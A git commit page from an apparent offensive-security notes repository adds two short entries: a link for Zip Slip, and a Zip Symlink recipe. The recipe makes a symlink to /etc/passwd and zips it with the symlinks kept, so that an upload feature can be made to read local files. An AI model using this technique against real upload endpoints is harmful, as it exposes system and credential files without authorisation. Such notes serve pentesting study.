whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
gurkenhabicht 2023-08-28 19:45:37 +02:00
parent 3834c1617e
commit ef401ad5ed
2 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Exploits/Compression/Zip Slip.md Normal file
View File

@ -0,0 +1,3 @@
# Zip Slip
* [snyk's ZipSlip repository](https://github.com/snyk/zip-slip-vulnerability)

16
Exploits/Compression/Zip Symlink.md Normal file
View File

@ -0,0 +1,16 @@
# Zip Symlink
https://effortlesssecurity.in/zip-symlink-vulnerability/
The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file.
Create a symlink and put it in a zip file.
```sh
ln -s /etc/passwd link.name
```
compress it leaving symlinks intact
```sh
zip -r --symlinks mal.zip link.name
```